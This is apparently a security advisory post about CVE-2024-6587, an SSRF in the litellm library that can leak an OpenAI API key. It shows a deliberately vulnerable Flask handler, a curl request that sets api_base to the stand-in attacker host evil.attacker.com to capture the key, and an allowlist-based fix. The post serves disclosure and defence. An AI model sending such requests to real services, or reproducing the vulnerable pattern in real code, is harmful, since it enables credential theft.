CVE-2024-6587 - How an SSRF in berriai/litellm 1.38.10 Can Leak Your OpenAI API Key
In June 2024, a vulnerability—CVE-2024-6587—was identified in berriai/litellm, a popular library for interacting with OpenAI’s and other LLM providers’ APIs. This post breaks down how a simple parameter, api_base, can be abused to send sensitive API keys to an attacker’s server, and explains how you can protect your systems.
What is litellm?
litellm is a Python library that provides a unified API for different LLM providers. You can use it to call OpenAI, Azure, Anthropic, and more, simply by changing a few parameters.
The project has thousands of downloads and is commonly used on the backend of AI web applications or internal LLM tools.
The Vulnerability: SSRF and API Key Leak
Server-Side Request Forgery (SSRF) lets an attacker make your server send HTTP requests to domains of their choosing. In litellm 1.38.10, the /chat/completions endpoint accepts a user-controlled parameter named api_base. If you provide an api_base, the application's backend will send the LLM request to that domain—instead of the default API endpoint.
The real issue: your backend will also include the OpenAI API key as an authentication header in that request. If an attacker sets up a malicious server, they can steal your API key.
CVE Details
- Project: berriai/litellm
- Version Affected: <= 1.38.10
- Endpoint: POST /chat/completions
1. Attacker sets up a malicious server that logs all incoming requests.
2. A victim user submits a chat completion via litellm, but sets api_base to the attacker’s server.
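Suppose you have an API exposed like this (simplified Python):

```python
import os

import requests
from flask import Flask, request

app = Flask(__name__)
OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]


@app.route("/chat/completions", methods=["POST"])
def chat_completions():
    request_json = request.json
    # VULNERABLE: the caller decides which host the backend talks to
    api_base = request_json.get("api_base", "https://api.openai.com")
    # ...other params...
    # The server's own key is attached no matter which host was chosen
    headers = {
        "Authorization": f"Bearer {OPENAI_API_KEY}"
    }
    response = requests.post(
        f"{api_base}/v1/chat/completions",
        json=request_json,  # your payload
        headers=headers,
    )
    return response.json()
```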
Now, here is how an attack works via curl:

```bash
curl -X POST https://vulnerable.app/chat/completions \
  -d '{"api_base": "https://evil.attacker.com"}'
```
On evil.attacker.com, a web server listens and dumps all headers and bodies from incoming requests. Voilà—the attacker now has your OPENAI_API_KEY.
If you use litellm
1. Update immediately to a fixed version (watch the litellm changelog).
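If you maintain a handler like the simplified one above, the server-side check looks like the following. This is an added example, not litellm's actual fix or code from the original post: `ALLOWED_API_BASES`, `normalize_base`, `build_upstream_request` and `UpstreamRejected` are hypothetical names, and the allowlist contents are an assumption you would set per deployment.

```python
from urllib.parse import urlsplit

# Assumption: the operator lists every upstream allowed to receive the server's key.
ALLOWED_API_BASES = {"https://api.openai.com"}
DEFAULT_API_BASE = "https://api.openai.com"


class UpstreamRejected(ValueError):
    """Raised when a caller-supplied api_base must not be contacted."""


def normalize_base(api_base):
    """Reduce a URL to scheme://host[:port] so the allowlist compares origins only."""
    if not isinstance(api_base, str):
        raise UpstreamRejected("api_base must be a string")
    try:
        parts = urlsplit(api_base.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        raise UpstreamRejected(f"unparseable api_base: {exc}") from exc
    if parts.scheme != "https":
        raise UpstreamRejected("api_base must use https")
    # "https://api.openai.com@other.host" parses with hostname "other.host"
    if parts.username or parts.password or not parts.hostname:
        raise UpstreamRejected("api_base must be a plain host")
    origin = "https://" + parts.hostname.lower().rstrip(".")
    if port not in (None, 443):
        origin += f":{port}"
    return origin


def build_upstream_request(body, server_key):
    """Return (url, headers) for the outbound call, or raise UpstreamRejected."""
    origin = normalize_base(body.get("api_base") or DEFAULT_API_BASE)
    if origin not in ALLOWED_API_BASES:
        raise UpstreamRejected(f"{origin} is not an approved upstream")
    # The key is attached only after the destination has passed the allowlist.
    headers = {"Authorization": f"Bearer {server_key}"}
    return f"{origin}/v1/chat/completions", headers
```

In the Flask handler, catch `UpstreamRejected` and return a 400 instead of making the outbound request.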
Final Thoughts
CVE-2024-6587 is a textbook lesson in why you must sanitize all user input, especially if any of it is used to build outbound requests. If you’re running any AI infrastructure—or exposing your backend to user-provided hosts—audit your code to look for trust boundaries like this.
Timeline
Published on: 09/13/2024 16:15:04 UTC
Last modified on: 09/20/2024 14:55:16 UTC